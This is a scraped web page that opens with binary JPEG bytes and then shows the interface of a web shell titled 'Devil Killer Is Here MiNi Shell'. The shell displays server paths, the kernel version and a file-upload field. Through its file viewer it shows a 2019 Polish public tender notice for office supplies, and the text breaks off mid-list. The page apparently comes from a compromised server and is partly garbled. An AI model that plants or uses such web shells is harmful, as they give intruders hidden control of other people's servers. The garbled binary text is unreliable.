JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190430/542597-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 542597-N-2019 z dnia 2019-04-30 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">1. Baza Lotnictwa Transportowego</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa materiałów i artykułów biurowych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">1. Baza Lotnictwa Transportowego</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">10088949300000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Żwirki i Wigury</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1c</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">00-909</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">261 821 316, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">1bltr.zampubliczne@ron.mil.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">261 821 316</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.1bltr.wp.mil.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">1. Baza Lotnictwa Transportowego</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://1bltr.wp.mil.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Wniosek o dopuszczenie do udziału w licytacji elektronicznej wraz z załącznikami należy składać do Kancelarii Jawnej Zamawiającego, 1. Baza Lotnictwa Transportowego, ul. Żwirki i Wigury 1C, 00-909 Warszawa, pok. 212, budynek 51, w formie pisemnej, w zamkniętej kopercie zabezpieczonej w sposób gwarantujący zachowanie w poufności treści wniosku</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa materiałów i artykułów biurowych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">13/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1- automat samotuszujący o polu min. 58x22 mm, zamykany, z okienkiem na opis pieczątki - różne kolory	szt.	20,2- automat samotuszujący o polu min. 47x18 mm, zamykany, z okienkiem na opis pieczątki - różne kolory	szt.	20,3- blok techniczny A4/10, kartki o grubości min. 200 g/m2	szt.	200,4- blok szkolny z kartkami w kratkę, format A5, ilość kartek 50, klejony od góry	szt.	200,5- cienkopis z fibrową końcówką oprawioną w metal, wypełniony tuszem typu dry safe,szerokość linii pisania 0,3 mm, minimum na skuwce lub klipsie zaznaczony kolor tuszu, obudowa z PP o przekroju trójkąta - minimum w 1/3 długości obudowy, nazwa producenta oraz typ podany na obudowie (kpl 4 kolory) w fabrycznym, sztywnym, wytłaczanym etui	kpl.	400,6- cienkopis wodoodporny z fibrową końcówką oprawioną w metal, szerokość linii pisania 0,3 mm, skuwka z klipsem w kolorze tuszu, obudowa z PP, nazwa producenta oraz typ podany na obudowie, kolor czarny	szt.	250,7- cienkopis z igłową końcówką, wymiennym wkładem, skuwka z klipsem w kolorze tuszu, obudowa z PP, z silikonową końcówką umożliwiającą poprawienie błędu, szerokość lini pisania 0,25 mm, tusz metamo, nazwa producenta oraz typ podany na obudowie, kolor niebieski. Cienkopis musi pasować do wkładu BLS -FRS5	szt.	300,8- cienkopis z igłową końcówką, wymiennym wkładem, skuwka z klipsem w kolorze tuszu, obudowa z PP, z silikonową końcówką umożliwiającą poprawienie błędu, szerokość lini pisania 0,25 mm, tusz metamo, nazwa producenta oraz typ podany na obudowie, kolor czarny. Cienkopis musi pasować do wkładu BLS -FRS5	szt.	300,9- cienkopis z igłową końcówką, wymiennym wkładem, skuwka z klipsem w kolorze tuszu, obudowa z PP, z silikonową końcówką umożliwiającą poprawienie błędu, szerokość lini pisania 0,25 mm, tusz metamo, nazwa producenta oraz typ podany na obudowie, kolor czerwony. Cienkopis musi pasować do wkładu BLS -FRS5 szt.	300,10- datownik samotuszujący gwarantujący min. 100 tys. odbić, w obudowie z tworzywa ABS, ręcznie ustawiany w wersji polskiej: dzień, miesiąc, rok, wysokość liter/cyfr 3,8 mm	szt.	50,11- długopis z wymiennym wkładem o grubości linii pisania do 0,27 mm, z końcówką niklowaną srebrem, grubość końcówki 0,7 mm, z kulką wykonaną z węglika wolframu, wkład czarny. Długopis musi pasować do wkładów BKL 77A	szt.	300,12- długopis z wymiennym wkładem o grubości linii pisania do 0,27 mm, z końcówką niklowaną srebrem, grubość końcówki 0,7 mm, z kulką wykonaną z węglika wolframu, wkład czerwony. Długopis musi pasować do wkładów BKL 77B	szt.	400,13- długopis z wymiennym wkładem o grubości linii pisania do 0,27 mm, z końcówką niklowaną srebrem, grubość końcówki 0,7 mm, z kulką wykonaną z węglika wolframu, wkład niebieski. Długopis musi pasować do wkładów BKL 77C	szt.	1000,14- długopis automatyczny z wymiennym, metalowym wkładem wielkopojemnym, górna część obudowy ośmiokątna, wykonana ze lśniącego tworzywa, wykończenia niklowane (okuwka, obrączka oraz klips), dolna część obudowy zakończona metalowym elementem trwale zamocowanym, grawerka producenta na klipsie, szerokość linii pisania 0,7-0,8 mm, długość linii pisania min. 2500 mm, dostępny w min. 7 kolorach, pakowany w blistrach, wkład niebieski	szt.	400,15- długopis żelowy z wymiennym wkładem, w przezroczystej obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką wykonaną ze wzmacnianej stali nierdzewnej, szerokość linii pisania do 0,25 mm, długość linii pisania min.1100 m, wkład czarny. Długopis musi pasować do wkładów BLS-G1-5-NF-B szt.	300,16- długopis żelowy z wymiennym wkładem, w przezroczystej obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką wykonaną ze wzmacnianej stali nierdzewnej, szerokość linii pisania do 0,25 mm, długość linii pisania min.1100m, wkład niebieski. Długopis musi pasować do wkładów BLS-G1-5-NF-L szt.	1000,17- długopis żelowy z wymiennym wkładem, w przezroczystej obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką wykonaną ze wzmacnianej stali nierdzewnej, szerokość linii pisania do 0,25 mm, długość linii pisania min.1100m, wkład czerwony. Długopis musi pasować do wkładów BLS-G1-5-NF-R szt.	500,18- długopis żelowy z wymiennym wkładem, w przezroczystej obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką wykonaną ze wzmacnianej stali nierdzewnej, szerokość linii pisania do 0,25 mm, długość linii pisania min.1100m, wkład zielony. Długopis musi pasować do wkładów BLS-G1-5-NF-G	szt.	200,19- dziurkacz dwuotworowy, metalowy, o zaokrąglonym ergonomicznym kształcie, z ogranicznikiem formatów A6/A5/A4/888, z certyfikatem bezpieczeństwa GS, dziurkujący min. 25 kartek	szt.	150,20- flamastry z wentylowaną skuwką, sześciokątna obudowa w kolorze tuszu, końcówka z włókna o średnicy 1,7-1,8 mm, grubośc linii pisania 1mm, odporne na wysychanie przez okres min. 5 lat, łatwo spieralny tusz, kpl. 6 kol. w fabrycznym etui	kpl.	300,21- folia do laminatora na gorąco, A3, grubość 125 mic., obustronnie przezroczysta, (op.100 szt.)	op.	40,22- folia do laminatora na gorąco, A4, grubość 125 mic., obustronnie matowa (op.100 szt.)	op.	60,23- foliopis uniwersalny napełniony wodoodpornym tuszem typu dry safe, pozostawiony bez skuwki nie wysycha, niezmywalny, odporny na działanie światła, możliwość pisania po różnych powierzchniach (folia, szkło, porcelan, płyty CD/DVD), grubość M, kpl. 4 kolory w etui (czarny, czerwony, niebieski, zielony)	kpl.	150,24- foliopis uniwersalny napełniony wodoodpornym tuszem typu dry safe, pozostawiony bez skuwki nie wysycha, niezmywalny, odporny na działanie światła, możliwość pisania poróżnych powierzchniach (folia, szkło, porcelan, płyty CD/DVD), grubość F, kpl. 4 kolory w etui (czarny, czerwony, niebieski, zielony)	kpl.	150,25- foliopis uniwersalny napełniony wodoodpornym tuszem typu dry safe, pozostawiony bez skuwki nie wysycha, niezmywalny, odporny na działanie światła, możliwość pisania poróżnych powierzchniach (folia, szkło, porcelan, płyty CD/DVD), grubość S, kpl. 4 kolory w etui (czarny, czerwony, niebieski, zielony)	kpl.	150,26- listwy do oprawy dokumentów formatu A4, 2 rogi zaokrąglone, grubość wypełnienia do 60 kartek, (op. 50szt.), kolor czarny i ciemno-niebieski, w równych ilościach każdego koloru op.3027- listwy do oprawy dokumentów formatu A4, 2 rogi zaokrąglone, grubość wypełnienia do 100 kartek, (op. 25 szt.), kolor czarny	op.	20,28- listwy do oprawy dokumentów formatu A4, 2 rogi zaokrąglone, grubość wypełnienia do 130 kartek, (op. 25 szt.), kolor czarny	op.	20,29- grzbiety do bindownicy, ? 10mm, (op. 100 szt.), kolor niebieski, czarny - jednakowe ilości.	op.	10,30- gumki recepturki, mix kolorów, op. 25 g	op.	100,31- podkład na biurko - kalendarz biuwar o wymiarach 590x395 mm (długość +/- 4mm; szerokość +/- 25mm), posiadający dwuletni nadruk (2019/2020), godzinowy plan tygodnia oraz dużo miejsca na notatki. Dół kalendarza zabezpieczony listwą chroniąca przed zaginaniem kartek.	szt.	200,32- kartki samoprzylepne usuwalne, w opakowaniu 3 bloczki po 100 kartek o wymiarach 51x38 mm, żółte op.	400,33- kartki samoprzylepne, usuwalne, w bloczku 100 kartek, o wymiarach 76x51mm, żółte	op.	300,34- kartki samoprzylepne, usuwalne, w bloczku 100 kartek, o wymiarach 76x76mm, żółte	op.	600,35- karteczki kolorowe klejone o wymiarach minimum 90x90x35 mm, minimum 5 neonowych kolorów w kostce, każda kostka w foli ochronnej	szt.	200,36- karteczki kolorowe klejone o wymiarach minimum 85x85x40 mm, minimum 5 pastelowych kolorów kolorów w kostce, każda kostka w foli ochronnej	szt.	400,37- koperta DL, biała wykonana z papieru o gramaturze min. 80 g/m2, samoklejąca z paskiem (op. 1000 szt.)	op.	10,38- korektor w taśmie, w przezroczystej obudowie, z ruchomym mechanizmem zabezpieczającym taśmę przed uszkodzeniem - regulacja poziomu napięcia taśmy oraz z plastikową skuwką zabezpieczającą, szer. taśmy 4,2-5 mm, dł. min. 14 m	szt.	100,39- korektor w kształcie pióra, szybkoschnący, z cienko piszącą metalową końcówką, pojemność min. 9 ml	szt.	240,40- koszulki na dokumenty A5, groszkowa, otwierane u góry, wykonane z ekologicznej folii polipropylenowej o grubości min 65 mic., antyelektrostatyczne, ze specjalnie wzmocnionym brzegiem (op. 100 szt.)	op.	60,41- kołonotatnik, format A5 plus, oprawa laminowana, gramatura papieru min 80 g/m2, 80 kartkowy w kratkę, z otworami umożliwiającymi wpięcie kartek do każdego rodzaju segregatora, z mikroperforacją i podwójną spiralą	szt.	100,42- koszulki na dokumenty A4, antyelektrostatyczne, z harmonijkowym brzegiem i dnem, wykonane z przezroczystej folii propylenowej o grubości min. 170 mic, mieszczące min. 200 kartek o gramaturze 80g/m2, zamykane od góry klapką, specjalnie wzmocniony perforowany brzeg (op. 5 szt.)	op.	50,43- klej w sztyfcie 40g, wysokiej jakości bez rozpuszczalników, do klejenia papieru, kartonu, z zamknięciem zabezpieczającym przed wyschnięciem i mechanizmem powodującym wysuwanie sztyftu z klejem.	szt.	300,44- klej typu wikol w tubie, poj. mini. 45 ml,łączący drewno, papier, tekturę, tkaniny.	szt.	120,45- kredki grube, w okrągłej, drewnianej oprawie, długość kredki 15 cm (+/- 0,5 cm), wkład o grubości 6 mm (+/- 1 mm), kpl. 12 kolorów w etui kpl.	80,46- linijka 30 cm z anodowanego aluminium, z wkładką antypoślizgową pod spodem, z nadrukowaną podziałką (mm)	szt.	50,47- linijka 50 cm z anodowanego aluminium, z wkładką antypoślizgową pod spodem, z nadrukowaną podziałką (mm)	szt.	40,48- linijka 30 cm z anodowanego aluminium, z dwoma skalami, z nadrukowaną podziałką (mm), z uchwytem oraz wkładką antypoślizgową pod spodem	szt.	30,49- linijka 20 cm z przezroczystego polistyrenu, nieścieralna podziałka, podcięte brzegi umożliwiające precyzyjne kreślenie	szt.	150,50- linijka 30 cm z przezroczystego polistyrenu, nieścieralna podziałka, podcięte brzegi umożliwiające precyzyjne kreślenie	szt.	100,51- magnesy do tablicy min. 20 mm (średnica magnesu min. 15 mm) (op. 10 szt.)	op.	100,52- marker z tuszem olejowym, wodoodpornym, odpornym na ścieranie, na działanie światła i warunków atmosferycznych, z cienką okrągłą końcówką wzmocnioną metalową obudową pozwalającą pisać precyzyjnie, szerokość linii pisania do 1,2 mm, kolor biały	szt.	50,53- marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperaturę do 100o C, z okrągłą końcówką, szerokość linii pisania 2,5 mm, kolor czarny	szt.	50,54- marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperaturę do 100o C, z okrągłą końcówką, szerokość linii pisania 2,5 mm, kolor czerwony	szt.	50,55- marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperaturę do 100o C, z okrągłą końcówką, szerokość linii pisania 2,5 mm, kolor niebieski	szt.	50,56- marker permanentny, piszący na papierze, skórze, plastiku i metalu, z systemem dry safe, z tuszem na bazie alkoholu odpornym na wodę, światło i temperaturę do 100o C, z okrągłą końcówką, szerokość linii pisania 2,5 mm, kolor zielony	szt.	50,57- pisak do tablic suchościeralnych, z okrągłą końcówką, z płynnym tuszem dozowanym za pomocą specjalnej pompki, długość linii pisania min.1000 m, grubość końcówki do 4 mm, kolor czarny	szt.	80,58- pisak do tablic suchościeralnych, z okrągłą końcówką, z płynnym tuszem dozowanym za pomocą specjalnej pompki, długość linii pisania min.1000 m, grubość końcówki do 4 